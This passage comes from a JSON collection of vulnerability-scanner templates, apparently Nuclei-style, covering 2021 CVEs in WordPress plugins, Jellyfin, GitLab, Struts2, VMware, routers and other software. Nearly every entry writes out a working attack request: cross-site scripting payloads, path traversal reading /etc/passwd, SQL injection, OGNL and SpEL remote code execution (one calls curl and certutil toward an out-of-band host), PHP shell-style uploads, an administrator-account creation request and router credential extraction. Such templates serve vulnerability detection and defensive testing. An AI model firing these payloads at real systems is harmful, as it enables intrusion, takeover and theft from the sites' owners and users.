Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: 